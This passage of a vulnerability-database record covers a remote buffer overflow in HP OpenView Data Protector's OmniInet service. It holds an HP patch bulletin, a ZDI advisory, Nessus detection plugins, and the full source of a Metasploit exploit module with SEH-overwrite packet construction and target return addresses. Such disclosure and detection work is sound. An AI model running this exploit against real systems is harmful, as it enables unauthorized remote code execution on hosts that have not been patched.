(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2007-2281 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Tenable Network Security working with the TippingPoint Zero Day Initiative and Pedram Amini and Aaron Portnoy, both of TippingPoint DV Labs for reporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following patches to resolve these vulnerabilities.\r\nThe patches are available from the following location\r\n\r\nURL http://itrc.hp.com\r\n\r\nOperating System/Description/Patch ID\r\n\r\nB.11.11, B.11.23, B.11.31 (PA)\r\n OV DP6.0 (Cell Server)\r\n PHSS_36588\r\n\r\nB.11.11, B.11.23, B.11.31 (PA)\r\n OV DP6.0 (Core)\r\n PHSS_36622\r\n\r\nB.11.23, B.11.31 (IA-64)\r\n OV DP6.0 (Cell Server)\r\n PHSS_36589\r\n\r\nB.11.23, B.11.31 (IA-64)\r\n OV DP6.0 (Core)\r\n PHSS_36623\r\n\r\nB.11.11, B.11.23 (PA)\r\n OV DP5.50 (Cell Server)\r\n PHSS_36799\r\n\r\nB.11.11, B.11.23 (PA)\r\n OV DP5.50 (Core)\r\n PHSS_37382\r\n\r\nB.11.23 (IA-64)\r\n OV DP5.50 (Cell Server)\r\n PHSS_36800\r\n\r\nB.11.23 (IA-64)\r\n OV DP5.50 (Core)\r\n PHSS_37383\r\n\r\nSolaris 2.8, 2.9, 2.10\r\n OV DP6.0 (Cell Server)\r\n DPSOL_00290\r\n\r\nSolaris 2.8, 2.9, 2.10\r\n OV DP6.0 (Core)\r\n DPSOL_00294\r\n\r\nSolaris 2.7, 2.8, 2.9\r\n OV DP5.50 (Cell Server)\r\n DPSOL_00300\r\n\r\nSolaris 2.7, 2.8, 2.9\r\n OV DP5.50 (Core)\r\n DPSOL_00321\r\n\r\nRedHat 4AS-x86_64, RedHat 4ES-x86_64\r\n OV DP6.0 (Cell Server)\r\n DPLNX_00025\r\n\r\nRedHat 4AS-x86_64, RedHat 4ES-x86_64\r\n OV DP6.0 (Core)\r\n DPLNX_00029\r\n\r\nWindows 2000/2003/XP\r\n OV DP6.0 (Cell Server)\r\n DPWIN_00337\r\n\r\nWindows 2000/2003/XP\r\n OV DP6.0 (Core)\r\n DPWIN_00329\r\n\r\nWindows 2000/2003/XP\r\n OV DP5.50 (Cell Server)\r\n DPWIN_00208\r\n\r\nWindows 2000/2003/XP\r\n OV DP5.50 (Core)\r\n DPWIN_00359\r\n\r\nMANUAL ACTIONS: No\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nFor OV DP6.0, PA-RISC\r\n\r\nHP-UX B.11.11, B.11.23, B.11.31\r\n==================\r\nDATA-PROTECTOR.OMNI-CS\r\naction: install PHSS_36588 or subsequent\r\naction: install PHSS_36622 or subsequent\r\n\r\nFor OV DP6.0, IA-64\r\nHP-UX B.11.23, B.11.31\r\n==================\r\nDATA-PROTECTOR.OMNI-CS\r\naction: install PHSS_36589 or subsequent\r\naction: install PHSS_36623 or subsequent\r\n\r\nFor OV DP5.50, PA-RISC\r\n\r\nHP-UX B.11.11, B.11.23\r\n==================\r\nDATA-PROTECTOR.OMNI-CS\r\naction: install PHSS_36799 or subsequent\r\naction: install PHSS_37382 or subsequent\r\n\r\nFor OV DP5.50, IA-64\r\nHP-UX B.11.23\r\n==================\r\nDATA-PROTECTOR.OMNI-CS\r\naction: install PHSS_36800 or subsequent\r\naction: install PHSS_37383 or subsequent\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion:1 (rev.1) 16 December 2009 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkspcYEACgkQ4B86/C0qfVkItgCg9uk6tgF3cfRS7sNf++8iiDZ8\r\n+zkAoLsnNDMz83rozws++rOLuTlz18Y1\r\n=qxAw\r\n-----END PGP SIGNATURE-----", "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "id": "SECURITYVULNS:DOC:22965", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22965", "title": "[security bulletin] HPSBMA02252 SSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:53", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Storage Data Protector. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the backup client service daemon (OmniInet.exe), which binds to TCP port 5555. During the processing of long arguments to the 'MSG_PROTOCOL' command, a stack based buffer overflow occurs and can result in code execution under the context of the daemon.", "modified": "2009-11-09T00:00:00", "published": "2009-12-17T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-09-099", "id": "ZDI-09-099", "title": "Hewlett-Packard OpenView Data Protector Backup Client Service Buffer Overflow Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-12T13:26:46", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the first one.\n", "modified": "2017-07-24T13:26:21", "published": "2010-01-06T20:04:58", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_1", "href": "", "type": "metasploit", "title": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the first one.\n },\n 'Author' =>\n [\n 'EgiX <n0b0d13s[at]gmail.com>',\n 'Fairuzan Roslan <riaf[at]mysec.org>',\n 'jduck'\n ],\n 'References' =>\n [\n [ 'CVE', '2007-2280' ],\n [ 'BID', '37396' ],\n [ 'OSVDB', '61206' ],\n [ 'ZDI', '09-099' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 4658+66,\n 'BadChars' => \"\\x00\", # (we don't want \\x00\\x00)\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic Targeting', { 'auto' => true } ],\n\n # DP Targets\n [ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330',\n {\n 'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)\n }\n ],\n [ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',\n {\n 'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)\n }\n ],\n\n # APPRM Targets\n [ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',\n {\n 'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)\n }\n ],\n [ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',\n {\n 'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 17 2009'))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def check\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if (resp)\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n # extract version\n if (resp =~ /HP Data Protector/)\n version = resp.split[3]\n elsif (resp =~ /HP OpenView Storage Data Protector/)\n version = resp.split[5]\n elsif (resp =~ /HP StorageWorks Application Recovery Manager/)\n version = resp.split[5]\n else\n return Exploit::CheckCode::Detected\n end\n\n version = version.split('.')\n major = version[1].to_i\n minor = version[2].to_i\n if ((major < 6) or (major == 6 and minor < 11))\n return Exploit::CheckCode::Appears\n end\n\n if ((major > 6) or (major == 6 and minor >= 11))\n return Exploit::CheckCode::Safe\n end\n\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n mytarget = target\n\n if (target['auto'])\n mytarget = nil\n\n print_status(\"Automatically detecting the target...\")\n\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if not resp\n fail_with(Failure::Unknown, \"No version response returned.\")\n end\n\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n self.targets.each do |t|\n if (resp =~ /#{t.name}/) then\n mytarget = t\n break\n end\n end\n\n if (not mytarget)\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n else\n print_status(\"Trying target #{mytarget.name}...\")\n end\n\n # separator between arguments\n sep = [0x2000].pack('N')\n\n # Unicode BOM\n pkt = \"\\xff\\xfe\"\n # MSG_PROTOCOL command\n pkt << Rex::Text.to_unicode(\"267\")\n\n # dunno\n 3.times do\n pkt << sep\n pkt << rand_text_alpha_upper(2)\n end\n\n # culprit string\n pkt << sep\n\n # the payload + seh record\n pkt << payload.encoded\n pkt << generate_seh_record(mytarget.ret)\n\n # jump back\n dist = payload_space + 8\n pkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + dist.to_s).encode_string\n\n # force exception hitting the end of the stack\n pkt << rand_text_alphanumeric(1000) * 25\n\n # 5th arg\n pkt << sep\n pkt << rand_text_alpha_upper(2)\n\n # end marker\n pkt << sep\n\n # packet length\n buff = [pkt.length].pack('N')\n buff << pkt\n\n connect\n print_status(\"Sending MSG_PROTOCOL packet...\")\n sock.put(buff)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_1.rb"}], "nessus": [{"lastseen": "2019-12-13T07:50:29", "bulletinFamily": "scanner", "description": "According to its version and build number, the HP Data Protector\napplication running on the remote host is affected by a stack-based\nbuffer overflow condition in the backup client service daemon\n(OmniInet.exe). An unauthenticated, remote attacker can exploit this,\nvia an MSG_PROTOCOL command with long arguments, to corrupt memory,\nresulting in the execution of arbitrary code.", "modified": "2019-12-02T00:00:00", "id": "HP_DATA_PROTECTOR_MSG_PROTOCOL_BOF.NASL", "href": "https://www.tenable.com/plugins/nessus/43635", "published": "2010-01-05T00:00:00", "title": "HP Data Protector OmniInet.exe MSG_PROTOCOL Command RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43635);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2007-2280\");\n script_bugtraq_id(37396);\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"Secunia\", value:\"37845\");\n script_xref(name:\"ZDI\", value:\"ZDI-09-099\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"HPSBMA02252\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n\n script_name(english:\"HP Data Protector OmniInet.exe MSG_PROTOCOL Command RCE\");\n script_summary(english:\"Does a banner check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The backup service running on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version and build number, the HP Data Protector\napplication running on the remote host is affected by a stack-based\nbuffer overflow condition in the backup client service daemon\n(OmniInet.exe). An unauthenticated, remote attacker can exploit this,\nvia an MSG_PROTOCOL command with long arguments, to corrupt memory,\nresulting in the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-09-099/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2009/Dec/258\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c01124817\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d59a99f7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patches referenced in the HP advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:storage_data_protector\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:data_protector\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"ssh_get_info.nasl\", \"hp_data_protector_installed.nasl\",\"hp_data_protector_installed_local.nasl\");\n script_require_keys(\"Services/data_protector/version\", \"Services/data_protector/build\");\n script_require_ports(\"Services/hp_openview_dataprotector\", 5555);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nport = get_kb_item(\"Services/hp_openview_dataprotector\");\nif (!port) port = 5555;\nif (!get_port_state(port)) exit(0, \"Port \"+port+\" is not open.\");\n\nversion = get_kb_item_or_exit(\"Services/data_protector/version\");\nbuild = get_kb_item_or_exit(\"Services/data_protector/build\");\n\nif (version == \"unknown\") audit(AUDIT_UNKNOWN_APP_VER, \"HP Data Protector\");\n\n# We need the HP-UX/Solaris version in order to reliably determine whether or\n# not those systems are vulnerable\nhpux_ver = get_kb_item(\"Host/HP-UX/version\");\nsolaris_ver = get_kb_item(\"Host/Solaris/Version\");\nrh_release = get_kb_item(\"Host/RedHat/release\");\nos = get_kb_item(\"Host/OS\");\nvulnerable = FALSE;\n\n# Ignore anything that looks like DP for Unix since it's not mentioned in the\n# advisory\nif ('SSPUX' >< build)\n vulnerable = FALSE;\nelse if (version == \"A.05.50\")\n{\n # unpatched version == build number (only HP-UX, Solaris, and Windows affected)\n if (\n (\n (hpux_ver && (hpux_ver == \"11.11\" || hpux_ver == \"11.23\")) ||\n (solaris_ver && (solaris_ver == \"5.7\" || solaris_ver == \"5.8\" || solaris_ver == \"5.9\")) ||\n (os && 'Windows' >< os)\n ) &&\n egrep (pattern:\"^[0-9]+\", string:build)\n )\n {\n vulnerable = TRUE;\n }\n\n # windows patch name (fixed in DPWIN_00359)\n else if (match = eregmatch(pattern:\"DPWIN_([0-9]+)\", string:build))\n {\n build_num = int(match[1]);\n if (build_num < 359)\n vulnerable = TRUE;\n }\n # HP-UX security patch (fixed in PHSS_37382 and PHSS_37383)\n else if (\n hpux_ver &&\n (hpux_ver == \"11.11\" || hpux_ver == \"11.23\") &&\n match = eregmatch(pattern:\"PHSS_([0-9]+)\", string:build)\n )\n {\n build_num = int(match[1]);\n if (build_num < 37382)\n vulnerable = TRUE;\n }\n # solaris security patch (fixed in DPSOL_00321)\n else if (\n solaris_ver &&\n (solaris_ver == \"5.7\" || solaris_ver == \"5.8\" || solaris_ver == \"5.9\") &&\n match = eregmatch(pattern:\"DPSOL_([0-9]+)\", string:build))\n {\n build_num = int(match[1]);\n if (build_num < 321)\n vulnerable = TRUE;\n }\n}\nelse if (version == \"A.06.00\")\n{\n # unpatched version == build number (all platforms affected for 06.00)\n if (egrep (pattern:\"^[0-9]+\", string:build))\n vulnerable = TRUE;\n\n # windows security patch (fixed in DPWIN_00329)\n if (match = eregmatch(pattern:\"DPWIN_([0-9]+)\", string:build))\n {\n build_num = int(match[1]);\n if (build_num < 329)\n vulnerable = TRUE;\n }\n # linux security patch (fixed in DPLNX_00029)\n else if (\n rh_release && 'release 4' >< rh_release &&\n match = eregmatch(pattern:\"DPLNX_([0-9]+)\", string:build)\n )\n {\n build_num = int(match[1]);\n if (build_num < 29)\n vulnerable = TRUE;\n }\n # solaris security patch (fixed in DPSOL_00294)\n else if (\n solaris_ver &&\n (solaris_ver == \"5.8\" || solaris_ver == \"5.9\" || solaris_ver == \"5.10\") &&\n match = eregmatch(pattern:\"DPSOL_([0-9]+)\", string:build)\n )\n {\n build_num = int(match[1]);\n if (build_num < 294)\n vulnerable = TRUE;\n }\n # HP-UX security patch (fixed in PHSS_36622 and PHSS_36623)\n else if (\n hpux_ver &&\n (hpux_ver == \"11.11\" || hpux_ver == \"11.23\" || hpux_ver == \"11.31\") &&\n match = eregmatch(pattern:\"PHSS_([0-9]+)\", string:build)\n )\n {\n build_num = int(match[1]);\n if (build_num < 36622)\n vulnerable = TRUE;\n }\n}\n\nif (vulnerable)\n{\n report = '\\nVersion : '+version+'\\nBuild : '+build+'\\n';\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN,\"HP Data Protector\", version, build);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP5.50 PA RISC patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36799.NASL", "href": "https://www.tenable.com/plugins/nessus/43138", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36799 : s700_800 11.X OV DP5.50 PA RISC patch - CS packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36799. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43138);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36799 : s700_800 11.X OV DP5.50 PA RISC patch - CS packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP5.50 PA RISC patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36799 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00 11.11 11.23\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_36799 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36799\", \"PHSS_37827\", \"PHSS_38726\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CS\", version:\"A.05.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP6.00 IA-64 patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36589.NASL", "href": "https://www.tenable.com/plugins/nessus/43135", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36589 : s700_800 11.X OV DP6.00 IA-64 patch - CS packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36589. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43135);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", 